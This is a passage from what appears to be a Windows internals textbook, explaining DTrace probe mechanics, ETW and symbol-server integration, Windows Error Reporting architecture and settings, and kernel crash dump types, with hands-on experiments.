functions). DTrace uses multiple techniques to achieve this, which
will be discussed in the “DTrace type library” section later in this
chapter.
■ A single function can exit (return) in multiple ways from different
code branches. To identify the exit points, a function graph analyzer is
required to disassemble the function’s instructions and find each exit
point. Even though the original function graph analyzer was part of
the Solaris code, the Windows implementation of DTrace uses a new
optimized version of it, which still lives in the LibDTrace library
(DTrace.dll). While user-mode functions are analyzed by the function
graph analyzer, DTrace uses the PDATA v2 unwind information to
reliably find kernel-mode function exit points (more information on
function unwinds and exception dispatching is available in Chapter
8). If the kernel-mode module does not make use of PDATA v2
unwind information, the FBT provider will not create any probes on
function returns for it.
DTrace installs FBT or PID probes by calling the KeSetTracepoint
function of the NT kernel exposed through the NT System interfaces array.
The function validates the parameters (the callback pointer in particular) and,
for kernel targets, verifies that the target function is located in an executable
code section of a known kernel-mode module. Similar to the syscall provider,
a KI_TRACEPOINT_ENTRY data structure is built and used for keeping
track of the activated trace points. The data structure contains the owning
process, access mode, and target function address. It is inserted in a global
hash table, KiTpHashTable, which is allocated at the first time an FBT or
PID probe gets activated. Finally, the single instruction located in the target
code is parsed (imported in the emulator) and replaced with a breakpoint
opcode. The trap bit in the global KiDynamicTraceMask bitmask is set.
For kernel-mode targets, the breakpoint replacement can happen only
when VBS (Virtualization Based Security) is enabled. The
MmWriteSystemImageTracepoint routine locates the loader data table entry
associated with the target function and invokes the
SECURESERVICE_SET_TRACEPOINT secure call. The Secure Kernel is
the only entity able to collaborate with HyperGuard and thus to render the
breakpoint application a legit code modification. As explained in Chapter 7
of Part 1, Kernel Patch protection (also known as Patchguard) prevents any
code modification from being performed on the NT kernel and some
essential kernel drivers. If VBS is not enabled on the system, and a debugger
is not attached, an error code is returned, and the probe application fails. If a
kernel debugger is attached, the breakpoint opcode is applied by the NT
kernel through the MmDbgCopyMemory function. (Patchguard is not enabled
on debugged systems.)
When called for debugger exceptions, which may be caused by a DTrace’s
FTB or PID probe firing, the system exception handler
(KiDispatchException) checks whether the “trap” bit is set in the global
KiDynamicTraceMask bitmask. If it is, the exception handler calls the
KiTpHandleTrap function, which searches into the KiTpHashTable to
determine whether the exception occurred thanks to a registered FTB or PID
probe firing. For user-mode probes, the function checks whether the process
context is the expected one. If it is, or if the probe is a kernel-mode one, the
function directly invokes the DTrace callback, FbtpCallback, which executes
the actions associated with the probe. When the callback completes, the
handler invokes the emulator, which emulates the original first instruction of
the target function before transferring the execution context to it.
EXPERIMENT: Tracing dynamic memory
In this experiment, you dynamically trace the dynamic memory
applied to a VM. Using Hyper-V Manager, you need to create a
generation 2 Virtual Machine and apply a minimum of 768 MB and
an unlimited maximum amount of dynamic memory (more
information on dynamic memory and Hyper-V is available in
Chapter 9). The VM should have the May 2019 (19H1) or May
2020 (20H1) Update of Windows 10 or later installed as well as the
DTrace package (which should be enabled as explained in the
“Enabling DTrace and listing the installed providers” experiment
from earlier in this chapter).
The dynamic_memory.d script, which can be found in this
book’s downloadable resources, needs to be copied in the DTrace
directory and started by typing the following commands in an
administrative command prompt window:
Click here to view code image
cd /d "c:\Program Files\DTrace"
dtrace.exe -s dynamic_memory.d
With only the preceding commands, DTrace will refuse to
compile the script because of an error similar to the following:
Click here to view code image
dtrace: failed to compile script dynamic_memory.d: line 62:
probe description fbt:nt:MiRem
ovePhysicalMemory:entry does not match any probes
This is because, in standard configurations, the path of the
symbols store is not set. The script attaches the FBT provider on
two OS functions: MmAddPhysicalMemory, which is exported
from the NT kernel binary, and MiRemovePhysicalMemory, which
is not exported or published in the public WDK. For the latter, the
FBT provider has no way to calculate its address in the system.
DTrace can obtain types and symbol information from different
sources, as explained in the “DTrace type library” section later in
this chapter. To allow the FBT provider to correctly work with
internal OS functions, you should set the Symbol Store’s path to
point to the Microsoft public symbol server, using the following
command:
Click here to view code image
set
_NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/dow
nload/symbols
After the symbol store’s path is set, if you restart DTrace
targeting the dynamic_memory.d script, it should be able to
correctly compile it and show the following output:
Click here to view code image
The Dynamic Memory script has begun.
Now you should simulate a high-memory pressure scenario. You
can do this in multiple ways—for example, by starting your
favorite browser and opening a lot of tabs, by starting a 3D game,
or by simply using the TestLimit tool with the -d command switch,
which forces the system to contiguously allocate memory and write
to it until all the resources are exhausted. The VM worker process
in the root partition should detect the scenario and inject new
memory in the child VM. This would be detected by DTrace:
Click here to view code image
Physical memory addition request intercepted. Start physical
address 0x00112C00, Number of
pages: 0x00000400.
Addition of 1024 memory pages starting at PFN 0x00112C00
succeeded!
In a similar way, if you close all the applications in the guest
VM and you recreate a high-memory pressure scenario in your host
system, the script would be able to intercept dynamic memory’s
removal requests:
Click here to view code image
Physical memory removal request intercepted. Start physical
address 0x00132000, Number of
pages: 0x00000200.
Removal of 512 memory pages starting at PFN 0x00132000
succeeded!
After interrupting DTrace using Ctrl+C, the script prints out
some statistics information:
Click here to view code image
Dynamic Memory script ended.
Numbers of Hot Additions: 217
Numbers of Hot Removals: 1602
Since starts the system has gained 0x00017A00 pages (378
MB).
If you open the dynamic_memory.d script using Notepad, you
will find that it installs a total of six probes (four FBT and two
built-in) and performs logging and counting actions. For example,
Click here to view code image
fbt:nt:MmAddPhysicalMemory:return
/ self->pStartingAddress != 0 /
installs a probe on the exit points of the MmAddPhysicalMemory
function only if the starting physical address obtained at function
entry point is not 0. More information on the D programming
language applied to DTrace is available in the The illumos
Dynamic Tracing Guide book, which is freely accessible at
http://dtrace.org/guide/preface.html.
The ETW provider
DTrace supports both an ETW provider, which allows probes to fire when
certain ETW events are generated by particular providers, and the etw_trace
action, which allows DTrace scripts to generate new customized
TraceLogging ETW events. The etw_trace action is implemented in
LibDTrace, which uses TraceLogging APIs to dynamically register a new
ETW provider and generate events associated with it. More information on
ETW has been presented in the “Event Tracing for Windows (ETW)” section
previously in this chapter.
The ETW provider is implemented in the DTrace driver. When the Trace
engine is initialized by the Pnp manager, it registers all providers with the
DTrace engine. At registration time, the ETW provider configures an ETW
session called DTraceLoggingSession, which is set to write events in a
circular buffer. When DTrace is started from the command line, it sends an
IOCTL to DTrace driver. The IOCTL handler calls the provide function of
each provider; the DtEtwpCreate internal function invokes the
NtTraceControl API with the EtwEnumTraceGuidList function code. This
allows DTrace to enumerate all the ETW providers registered in the system
and to create a probe for each of them. (dtrace -l is also able to display ETW
probes.)
When a D script targeting the ETW provider is compiled and executed, the
internal DtEtwEnable routine gets called with the goal of enabling one or
more ETW probes. The logging session configured at registration time is
started, if it’s not already running. Through the trace extension context
(which, as previously discussed, contains private system interfaces), DTrace
is able to register a kernel-mode callback called every time a new event is
logged in the DTrace logging session. The first time that the session is
started, there are no providers associated with it. Similar to the syscall and
FBT provider, for each probe DTrace creates a tracking data structure and
inserts it in a global RB tree (DtEtwpProbeTree) representing all the enabled
ETW probes. The tracking data structure is important because it represents
the link between the ETW provider and the probes associated with it. DTrace
calculates the correct enablement level and keyword bitmask for the provider
(see the “Provider Enablement” section previously in this chapter for more
details) and enables the provider in the session by invoking the
NtTraceControl API.
When an event is generated, the ETW subsystem calls the callback routine,
which searches into the global ETW probe tree the correct context data
structure representing the probe. When found, DTrace can fire the probe (still
using the internal dtrace_probe function) and execute all the actions
associated with it.
DTrace type library
DTrace works with types. System administrators are able to inspect internal
operating system data structures and use them in D clauses to describe
actions associated with probes. DTrace also supports supplemental data types
compared to the ones supported by the standard D programming language.
To be able to work with complex OS-dependent data types and allow the
FBT and PID providers to set probes on internal OS and application
functions, DTrace obtains information from different sources:
■ Function names, signatures, and data types are initially extracted from
information embedded in the executable binary (which adheres to the
Portable Executable file format), like from the export table and debug
information.
■ For the original DTrace project, the Solaris operating system included
support for Compact C Type Format (CTF) in its executable binary
files (which adhere to the Executable and Linkable Format - ELF).
This allowed the OS to store the debug information needed by DTrace
to run directly into its modules (the debug information can also be
stored using the deflate compression format). The Windows version
of DTrace still supports a partial CTF, which has been added as a
resource section of the LibDTrace library (Dtrace.dll). CTF in the
LibDTrace library stores the type information contained in the public
WDK (Windows Driver Kit) and SDK (Software Development Kit)
and allows DTrace to work with basic OS data types without
requiring any symbol file.
■ Most of the private types and internal OS function signatures are
obtained from PDB symbols. Public PDB symbols for the majority of
the operating system’s modules are downloadable from the Microsoft
Symbol Server. (These symbols are the same as those used by the
Windows Debugger.) The symbols are deeply used by the FBT
provider to correctly identify internal OS functions and by DTrace to
be able to retrieve the correct type of parameters for each syscall and
function.
The DTrace symbol server
DTrace includes an autonomous symbol server that can download PDB
symbols from the Microsoft public Symbol store and render them available to
the DTrace subsystem. The symbol server is implemented mainly in
LibDTrace and can be queried by the DTrace driver using the Inverted call
model. As part of the providers’ registration, the DTrace driver registers a
SymServer pseudo-provider. The latter is not a real provider but just a
shortcut for allowing the symsrv handler to the DTrace control device to be
registered.
When DTrace is started from the command line, the LibDTrace library
starts the symbols server by opening a handle to the \\.\dtrace\symsrv control
device (using the standard CreateFile API). The request is processed by the
DTrace driver through the Symbol server IRP handler, which registers the
user-mode process, adding it in an internal list of symbols server processes.
LibDTrace then starts a new thread, which sends a dummy IOCTL to the
DTrace symbol server device and waits indefinitely for a reply from the
driver. The driver marks the IRP as pending and completes it only when a
provider (or the DTrace subsystem), requires new symbols to be parsed.
Every time the driver completes the pending IRP, the DTrace symbols
server thread wakes up and uses services exposed by the Windows Image
Helper library (Dbghelp.dll) to correctly download and parse the required
symbol. The driver then waits for a new dummy IOCTL to be sent from the
symbols thread. This time the new IOCTL will contain the results of the
symbol parsing process. The user-mode thread wakes up again only when the
DTrace driver requires it.
Windows Error Reporting (WER)
Windows Error Reporting (WER) is a sophisticated mechanism that
automates the submission of both user-mode process crashes as well as
kernel-mode system crashes. Multiple system components have been
designed for supporting reports generated when a user-mode process,
protected process, trustlet, or the kernel crashes.
Windows 10, unlike from its predecessors, does not include a graphical
dialog box in which the user can configure the details that Windows Error
Reporting acquires and sends to Microsoft (or to an internal server
configured by the system administrator) when an application crashes. As
shown in Figure 10-38, in Windows 10, the Security and Maintenance applet
of the Control Panel can show the user a history of the reports generated by
Windows Error Reporting when an application (or the kernel) crashes. The
applet can show also some basic information contained in the report.
Figure 10-38 The Reliability monitor of the Security and Maintenance
applet of the Control Panel.
Windows Error Reporting is implemented in multiple components of the
OS, mainly because it needs to deal with different kind of crashes:
■ The Windows Error Reporting Service (WerSvc.dll) is the main
service that manages the creation and sending of reports when a user-
mode process, protected process, or trustlet crashes.
■ The Windows Fault Reporting and Secure Fault Reporting
(WerFault.exe and WerFaultSecure.exe) are mainly used to acquire a
snapshot of the crashing application and start the generation and
sending of a report to the Microsoft Online Crash Analysis site (or, if
configured, to an internal error reporting server).
■ The actual generation and transmission of the report is performed by
the Windows Error Reporting Dll (Wer.dll). The library includes all
the functions used internally by the WER engine and also some
exported API that the applications can use to interact with Windows
Error Reporting (documented at https://docs.microsoft.com/en-
us/windows/win32/api/_wer/). Note that some WER APIs are also
implemented in Kernelbase.dll and Faultrep.dll.
■ The Windows User Mode Crash Reporting DLL (Faultrep.dll)
contains common WER stub code that is used by system modules
(Kernel32.dll, WER service, and so on) when a user-mode application
crashes or hangs. It includes services for creating a crash signature
and reports a hang to the WER service, managing the correct security
context for the report creation and transmission (which includes the
creation of the WerFault executable under the correct security token).
■ The Windows Error Reporting Dump Encoding Library (Werenc.dll)
is used by the Secure Fault Reporting to encrypt the dump files
generated when a trustlet crashes.
■ The Windows Error Reporting Kernel Driver (WerKernel.sys) is a
kernel library that exports functions to capture a live kernel memory
dump and submit the report to the Microsoft Online Crash Analysis
site. Furthermore, the driver includes APIs for creating and submitting
reports for user-mode faults from a kernel-mode driver.
Describing the entire architecture of WER is outside the scope of this
book. In this section, we mainly describe error reporting for user-mode
applications and the NT kernel (or kernel-driver) crashes.
User applications crashes
As discussed in Chapter 3 of Part 1, all the user-mode threads in Windows
start with the RtlUserThreadStart function located in Ntdll. The function does
nothing more than calling the real thread start routine under a structured
exception handler. (Structured exception handling is described in Chapter 8.)
The handler protecting the real start routine is internally called Unhandled
Exception Handler because it is the last one that can manage an exception
happening in a user-mode thread (when the thread does not already handle it).
The handler, if executed, usually terminates the process with the
NtTerminateProcess API. The entity that decides whether to execute the
handler is the unhandled exception filter, RtlpThreadExceptionFilter.
Noteworthy is that the unhandled exception filter and handler are executed
only under abnormal conditions; normally, applications should manage their
own exceptions with inner exception handlers.
When a Win32 process is starting, the Windows loader maps the needed
imported libraries. The kernelbase initialization routine installs its own
unhandled exception filter for the process, the UnhandledExceptionFilter
routine. When a fatal unhandled exception happens in a process’s thread, the
filter is called to determine how to process the exception. The kernelbase
unhandled exception filter builds context information (such as the current
value of the machine’s registers and stack, the faulting process ID, and thread
ID) and processes the exception:
■ If a debugger is attached to the process, the filter lets the exception
happen (by returning CONTINUE_SEARCH). In this way, the
debugger can break and see the exception.
■ If the process is a trustlet, the filter stops any processing and invokes
the kernel to start the Secure Fault Reporting (WerFaultSecure.exe).
■ The filter calls the CRT unhandled exception routine (if it exists) and,
in case the latter does not know how to handle the exception, it calls
the internal WerpReportFault function, which connects to the WER
service.
Before opening the ALPC connection, WerpReportFault should wake up
the WER service and prepare an inheritable shared memory section, where it
stores all the context information previously acquired. The WER service is a
direct triggered-start service, which is started by the SCM only in case the
WER_SERVICE_START WNF state is updated or in case an event is written
in a dummy WER activation ETW provider (named Microsoft-Windows-
Feedback-Service-Triggerprovider). WerpReportFault updates the relative
WNF state and waits on the \KernelObjects\SystemErrorPortReady event,
which is signaled by the WER service to indicate that it is ready to accept
new connections. After a connection has been established, Ntdll connects to
the WER service’s \WindowsErrorReportingServicePort ALPC port, sends
the WERSVC_REPORT_CRASH message, and waits indefinitely for its reply.
The message allows the WER service to begin to analyze the crashed
program’s state and performs the appropriate actions to create a crash report.
In most cases, this means launching the WerFault.exe program. For user-
mode crashes, the Windows Fault Reporting process is invoked two times
using the faulting process’s credentials. The first time is used to acquire a
“snapshot” of the crashing process. This feature was introduced in Windows
8.1 with the goal of rendering the crash report generation of UWP
applications (which, at that time, were all single-instance applications) faster.
In that way, the user could have restarted a crashed UWP application without
waiting for the report being generated. (UWP and the modern application
stack are discussed in Chapter 8.)
Snapshot creation
WerFault maps the shared memory section containing the crash data and
opens the faulting process and thread. When invoked with the -pss command-
line argument (used for requesting a process snapshot), it calls the
PssNtCaptureSnapshot function exported by Ntdll. The latter uses native
APIs to query multiple information regarding the crashing process (like basic
information, job information, process times, secure mitigations, process file
name, and shared user data section). Furthermore, the function queries
information regarding all the memory sections baked by a file and mapped in
the entire user-mode address space of the process. It then saves all the
acquired data in a PSS_SNAPSHOT data structure representing a snapshot. It
finally creates an identical copy of the entire VA space of the crashing
process into another dummy process (cloned process) using the
NtCreateProcessEx API (providing a special combination of flags). From
now on, the original process can be terminated, and further operations needed
for the report can be executed on the cloned process.
Note
WER does not perform any snapshot creation for protected processes and
trustlets. In these cases, the report is generated by obtaining data from the
original faulting process, which is suspended and resumed only after the
report is completed.
Crash report generation
After the snapshot is created, execution control returns to the WER service,
which initializes the environment for the crash report creation. This is done
mainly in two ways:
■ If the crash happened to a normal, unprotected process, the WER
service directly invokes the WerpInitiateCrashReporting routine
exported from the Windows User Mode Crash Reporting DLL
(Faultrep.dll).
■ Crashes belonging to protected processes need another broker
process, which is spawned under the SYSTEM account (and not the
faulting process credentials). The broker performs some verifications
and calls the same routine used for crashes happening in normal
processes.
The WerpInitiateCrashReporting routine, when called from the WER
service, prepares the environment for executing the correct Fault Reporting
process. It uses APIs exported from the WER library to initialize the machine
store (which, in its default configuration, is located in
C:\ProgramData\Microsoft\Windows\WER) and load all the WER settings
from the Windows registry. WER indeed contains many customizable
options that can be configured by the user through the Group Policy editor or
by manually making changes to the registry. At this stage, WER
impersonates the user that has started the faulting application and starts the
correct Fault Reporting process using the -u main command-line switch,
which indicates to the WerFault (or WerFaultSecure) to process the user
crash and create a new report.
Note
If the crashing process is a Modern application running under a low-
integrity level or AppContainer token, WER uses the User Manager
service to generate a new medium-IL token representing the user that has
launched the faulting application.
Table 10-19 lists the WER registry configuration options, their use, and
possible values. These values are located under the
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting subkey
for computer configuration and in the equivalent path under
HKEY_CURRENT_USER for per-user configuration (some values can also
be present in the \Software\Policies\Microsoft\Windows\Windows Error
Reporting key).
Table 10-19 WER registry settings
Settings
Meaning
Values
Configure
Archive
Contents of archived data
1 for parameters, 2 for all
data
Consent\D
efaultCons
ent
What kind of data should
require consent
1 for any data, 2 for
parameters only, 3 for
parameters and safe data, 4
for all data.
Consent\D
efaultOver
rideBehavi
or
Whether the
DefaultConsent overrides
WER plug-in consent
values
1 to enable override
Consent\P
luginName
Consent value for a
specific WER plug-in
Same as DefaultConsent
Corporate
WERDirec
tory
Directory for a corporate
WER store
String containing the path
Corporate
WERPort
Number
Port to use for a corporate
WER store
Port number
Corporate
WERServe
r
Name to use for a
corporate WER store
String containing the name
Corporate
WERUseA
uthenticati
on
Use Windows Integrated
Authentication for
corporate WER store
1 to enable built-in
authentication
Corporate
WERUseS
SL
Use Secure Sockets Layer
(SSL) for corporate WER
store
1 to enable SSL
DebugApp
lications
List of applications that
require the user to choose
between Debug and
Continue
1 to require the user to
choose
DisableAr
Whether the archive is
1 to disable archive
chive
enabled
Disabled
Whether WER is disabled
1 to disable WER
DisableQu
eue
Determines whether
reports are to be queued
1 to disable queue
DontShow
UI
Disables or enables the
WER UI
1 to disable UI
DontSend
Additional
Data
Prevents additional crash
data from being sent
1 not to send
ExcludedA
pplication
s\AppNam
e
List of applications
excluded from WER
String containing the
application list
ForceQue
ue
Whether reports should be
sent to the user queue
1 to send reports to the
queue
LocalDum
ps\DumpF
older
Path at which to store the
dump files
String containing the path
LocalDum
ps\DumpC
ount
Maximum number of dump
files in the path
Count
LocalDum
ps\DumpT
ype
Type of dump to generate
during a crash
0 for a custom dump, 1 for a
minidump, 2 for a full dump
LocalDum
For custom dumps,
Values defined in
ps\Custom
DumpFlag
s
specifies custom options
MINIDUMP_TYPE (see
Chapter 12 for more
information)
LoggingDi
sabled
Enables or disables logging
1 to disable logging
MaxArchi
veCount
Maximum size of the
archive (in files)
Value between 1–5000
MaxQueue
Count
Maximum size of the
queue
Value between 1–500
QueuePest
erInterval
Days between requests to
have the user check for
solutions
Number of days
The Windows Fault Reporting process started with the -u switch starts the
report generation: the process maps again the shared memory section
containing the crash data, identifies the exception’s record and descriptor,
and obtains the snapshot taken previously. In case the snapshot does not
exist, the WerFault process operates directly on the faulting process, which is
suspended. WerFault first determines the nature of the faulting process
(service, native, standard, or shell process). If the faulting process has asked
the system not to report any hard errors (through the SetErrorMode API), the
entire process is aborted, and no report is created. Otherwise, WER checks
whether a default post-mortem debugger is enabled through settings stored in
the AeDebug subkey (AeDebugProtected for protected processes) under the
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ root registry
key. Table 10-20 describes the possible values of both keys.
Table 10-20 Valid registry values used for the AeDebug and
AeDebugProtected root keys
Val
ue
Meaning
Data
na
me
De
bug
ger
Specify the
debugger
executable to be
launched when an
application
crashes.
Full path of the debugger executable, with
eventual command-line arguments. The -p
switch is automatically added by WER,
pointing it to the crashing process ID.
Pro
tect
ed
De
bug
ger
Same as Debugger
but for protected
processes only.
Full path of the debugger executable. Not
valid for the AeDebug key.
Aut
o
Specify the
Autostartup mode
1 to enable the launching of the debugger
in any case, without any user consent, 0
otherwise.
Lau
nch
No
nPr
ote
cte
d
Specify whether
the debugger
should be executed
as unprotected.
This setting applies
only to the
AeDebugProtected
key.
1 to launch the debugger as a standard
process.
If the debugger start type is set to Auto, WER starts it and waits for a
debugger event to be signaled before continuing the report creation. The
report generation is started through the internal GenerateCrashReport routine
implemented in the User Mode Crash Reporting DLL (Faultrep.dll). The
latter configures all the WER plug-ins and initializes the report using the
WerReportCreate API, exported from the WER.dll. (Note that at this stage,
the report is only located in memory.) The GenerateCrashReport routine
calculates the report ID and a signature and adds further diagnostics data to
the report, like the process times and startup parameters or application-
defined data. It then checks the WER configuration to determine which kind
of memory dump to create (by default, a minidump is acquired). It then calls
the exported WerReportAddDump API with the goal to initialize the dump
acquisition for the faulting process (it will be added to the final report). Note
that if a snapshot has been previously acquired, it is used for acquiring the
dump.
The WerReportSubmit API, exported from WER.dll, is the central routine
that generates the dump of the faulting process, creates all the files included
in the report, shows the UI (if configured to do so by the DontShowUI
registry value), and sends the report to the Online Crash server. The report
usually includes the following:
■ A minidump file of the crashing process (usually named
memory.hdmp)
■ A human-readable text report, which includes exception information,
the calculated signature of the crash, OS information, a list of all the
files associated with the report, and a list of all the modules loaded in
the crashing process (this file is usually named report.wer)
■ A CSV (comma separated values) file containing a list of all the
active processes at the time of the crash and basic information (like
the number of threads, the private working set size, hard fault count,
and so on)
■ A text file containing the global memory status information
■ A text file containing application compatibility information
The Fault Reporting process communicates through ALPC to the WER
service and sends commands to allow the service to generate most of the
information present in the report. After all the files have been generated, if
configured appropriately, the Windows Fault Reporting process presents a
dialog box (as shown in Figure 10-39) to the user, notifying that a critical
error has occurred in the target process. (This feature is disabled by default in
Windows 10.)
Figure 10-39 The Windows Error Reporting dialog box.
In environments where systems are not connected to the Internet or where
the administrator wants to control which error reports are submitted to
Microsoft, the destination for the error report can be configured to be an
internal file server. The System Center Desktop Error Monitoring (part of the
Microsoft Desktop Optimization Pack) understands the directory structure
created by Windows Error Reporting and provides the administrator with the
option to take selective error reports and submit them to Microsoft.
As previously discussed, the WER service uses an ALPC port for
communicating with crashed processes. This mechanism uses a systemwide
error port that the WER service registers through NtSetInformationProcess
(which uses DbgkRegisterErrorPort). As a result, all Windows processes
have an error port that is actually an ALPC port object registered by the
WER service. The kernel and the unhandled exception filter in Ntdll use this
port to send a message to the WER service, which then analyzes the crashing
process. This means that even in severe cases of thread state damage, WER is
still able to receive notifications and launch WerFault.exe to log the detailed
information of the critical error in a Windows Event log (or to display a user
interface to the user) instead of having to do this work within the crashing
thread itself. This solves all the problems of silent process death: Users are
notified, debugging can occur, and service administrators can see the crash
event.
EXPERIMENT: Enabling the WER user interface
Starting with the initial release of Windows 10, the user interface
displayed by WER when an application crashes has been disabled
by default. This is primarily because of the introduction of the
Restart Manager (part of the Application Recovery and Restart
technology). The latter allows applications to register a restart or
recovery callback invoked when an application crashes, hangs, or
just needs to be restarted for servicing an update. As a result,
classic applications that do not register any recovery callback when
they encounter an unhandled exception just terminate without
displaying any message to the user (but correctly logging the error
in the system log). As discussed in this section, WER supports a
user interface, which can be enabled by just adding a value in one
of the WER keys used for storing settings. For this experiment, you
will re-enable the WER UI using the global system key.
From the book’s downloadable resources, copy the BuggedApp
executable and run it. After pressing a key, the application
generates a critical unhandled exception that WER intercepts and
reports. In default configurations, no error message is displayed.
The process is terminated, an error event is stored in the system
log, and the report is generated and sent without any user
intervention. Open the Registry Editor (by typing regedit in the
Cortana search box) and navigate to the
HKLM\SOFTWARE\Microsoft\Windows \Windows Error
Reporting registry key. If the DontShowUI value does not exist,
create it by right-clicking the root key and selecting New,
DWORD (32 bit) Value and assign 0 to it.
If you restart the bugged application and press a key, WER
displays a user interface similar to the one shown in Figure 10-39
before terminating the crashing application. You can repeat the
experiment by adding a debugger to the AeDebug key. Running
Windbg with the -I switch performs the registration automatically,
as discussed in the “Witnessing a COM-hosted task” experiment
earlier in this chapter.
Kernel-mode (system) crashes
Before discussing how WER is involved when a kernel crashes, we need to
introduce how the kernel records crash information. By default, all Windows
systems are configured to attempt to record information about the state of the
system before the Blue Screen of Death (BSOD) is displayed, and the system
is restarted. You can see these settings by opening the System Properties
tool in Control Panel (under System and Security, System, Advanced
System Settings), clicking the Advanced tab, and then clicking the Settings
button under Startup and Recovery. The default settings for a Windows
system are shown in Figure 10-40.
Figure 10-40 Crash dump settings.
Crash dump files
Different levels of information can be recorded on a system crash:
■ Active memory dump An active memory dump contains all physical
memory accessible and in use by Windows at the time of the crash.
This type of dump is a subset of the complete memory dump; it just
filters out pages that are not relevant for troubleshooting problems on
the host machine. This dump type includes memory allocated to user-
mode applications and active pages mapped into the kernel or user
space, as well as selected Pagefile-backed Transition, Standby, and
Modified pages such as the memory allocated with VirtualAlloc or
page-file backed sections. Active dumps do not include pages on the
free and zeroed lists, the file cache, guest VM pages, and various
other types of memory that are not useful during debugging.
■ Complete memory dump A complete memory dump is the largest
kernel-mode dump file that contains all the physical pages accessible
by Windows. This type of dump is not fully supported on all
platforms (the active memory dump superseded it). Windows requires
that a page file be at least the size of physical memory plus 1 MB for
the header. Device drivers can add up to 256 548MB for secondary
crash dump data, so to be safe, it’s recommended that you increase
the size of the page file by an additional 256 MB.
■ Kernel memory dump A kernel memory dump includes only the
kernel-mode pages allocated by the operating system, the HAL, and
device drivers that are present in physical memory at the time of the
crash. This type of dump does not contain pages belonging to user
processes. Because only kernel-mode code can directly cause
Windows to crash, however, it’s unlikely that user process pages are
necessary to debug a crash. In addition, all data structures relevant for
crash dump analysis—including the list of running processes, the
kernel-mode stack of the current thread, and list of loaded drivers—
are stored in nonpaged memory that saves in a kernel memory dump.
There is no way to predict the size of a kernel memory dump because
its size depends on the amount of kernel-mode memory allocated by
the operating system and drivers present on the machine.
■ Automatic memory dump This is the default setting for both
Windows client and server systems. An automatic memory dump is
similar to a kernel memory dump, but it also saves some metadata of
the active user-mode process (at the time of the crash). Furthermore,
this dump type allows better management of the system paging file’s
size. Windows can set the size of the paging file to less than the size
of RAM but large enough to ensure that a kernel memory dump can
be captured most of the time.
■ Small memory dump A small memory dump, which is typically
between 128 KB and 1 MB in size and is also called a minidump or
triage dump, contains the stop code and parameters, the list of loaded
device drivers, the data structures that describe the current process
and thread (called the EPROCESS and ETHREAD—described in
Chapter 3 of Part 1), the kernel stack for the thread that caused the
crash, and additional memory considered potentially relevant by crash
dump heuristics, such as the pages referenced by processor registers
that contain memory addresses and secondary dump data added by
drivers.
Note
Device drivers can register a secondary dump data callback routine by
calling KeRegisterBugCheckReasonCallback. The kernel invokes these
callbacks after a crash and a callback routine can add additional data to a
crash dump file, such as device hardware memory or device information
for easier debugging. Up to 256 MB can be added systemwide by all
drivers, depending on the space required to store the dump and the size of
the file into which the dump is written, and each callback can add at most
one-eighth of the available additional space. Once the additional space is
consumed, drivers subsequently called are not offered the chance to add
data.
The debugger indicates that it has limited information available to it when
it loads a minidump, and basic commands like !process, which lists active
processes, don’t have the data they need. A kernel memory dump includes
more information, but switching to a different process’s address space
mappings won’t work because required data isn’t in the dump file. While a
complete memory dump is a superset of the other options, it has the
drawback that its size tracks the amount of physical memory on a system and
can therefore become unwieldy. Even though user-mode code and data
usually are not used during the analysis of most crashes, the active memory
dump overcame the limitation by storing in the dump only the memory that is
actually used (excluding physical pages in the free and zeroed list). As a
result, it is possible to switch address space in an active memory dump.
An advantage of a minidump is its small size, which makes it convenient
for exchange via email, for example. In addition, each crash generates a file
in the directory %SystemRoot%\Minidump with a unique file name
consisting of the date, the number of milliseconds that have elapsed since the
system was started, and a sequence number (for example, 040712-24835-
01.dmp). If there’s a conflict, the system attempts to create additional unique
file names by calling the Windows GetTickCount function to return an
updated system tick count, and it also increments the sequence number. By
default, Windows saves the last 50 minidumps. The number of minidumps
saved is configurable by modifying the MinidumpsCount value under the
HKLM\SYSTEM\CurrentControlSet\Control\ CrashControl registry key.
A significant disadvantage is that the limited amount of data stored in the
dump can hamper effective analysis. You can also get the advantages of
minidumps even when you configure a system to generate kernel, complete,
active, or automatic crash dumps by opening the larger crash with WinDbg
and using the .dump /m command to extract a minidump. Note that a
minidump is automatically created even if the system is set for full or kernel
dumps.
Note
You can use the .dump command from within LiveKd to generate a
memory image of a live system that you can analyze offline without
stopping the system. This approach is useful when a system is exhibiting a
problem but is still delivering services, and you want to troubleshoot the
problem without interrupting service. To prevent creating crash images
that aren’t necessarily fully consistent because the contents of different
regions of memory reflect different points in time, LiveKd supports the –
m flag. The mirror dump option produces a consistent snapshot of kernel-
mode memory by leveraging the memory manager’s memory mirroring
APIs, which give a point-in-time view of the system.
The kernel memory dump option offers a practical middle ground.
Because it contains all kernel-mode-owned physical memory, it has the same
level of analysis-related data as a complete memory dump, but it omits the
usually irrelevant user-mode data and code, and therefore can be significantly
smaller. As an example, on a system running a 64-bit version of Windows
with 4 GB of RAM, a kernel memory dump was 294 MB in size.
When you configure kernel memory dumps, the system checks whether
the paging file is large enough, as described earlier. There isn’t a reliable way
to predict the size of a kernel memory dump. The reason you can’t predict
the size of a kernel memory dump is that its size depends on the amount of
kernel-mode memory in use by the operating system and drivers present on
the machine at the time of the crash. Therefore, it is possible that at the time
of the crash, the paging file is too small to hold a kernel dump, in which case
the system will switch to generating a minidump. If you want to see the size
of a kernel dump on your system, force a manual crash either by configuring
the registry option to allow you to initiate a manual system crash from the
console (documented at https://docs.microsoft.com/en-us/windows-
hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard) or by
using the Notmyfault tool (https://docs.microsoft.com/en-
us/sysinternals/downloads/notmyfault).
The automatic memory dump overcomes this limitation, though. The
system will be indeed able to create a paging file large enough to ensure that
a kernel memory dump can be captured most of the time. If the computer
crashes and the paging file is not large enough to capture a kernel memory
dump, Windows increases the size of the paging file to at least the size of the
physical RAM installed.
To limit the amount of disk space that is taken up by crash dumps,
Windows needs to determine whether it should maintain a copy of the last
kernel or complete dump. After reporting the kernel fault (described later),
Windows uses the following algorithm to decide whether it should keep the
Memory.dmp file. If the system is a server, Windows always stores the dump
file. On a Windows client system, only domain-joined machines will always
store a crash dump by default. For a non-domain-joined machine, Windows
maintains a copy of the crash dump only if there is more than 25 GB of free
disk space on the destination volume (4 GB on ARM64, configurable via the
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\PersistDumpDis
kSpaceLimit registry value)—that is, the volume where the system is
configured to write the Memory.dmp file. If the system, due to disk space
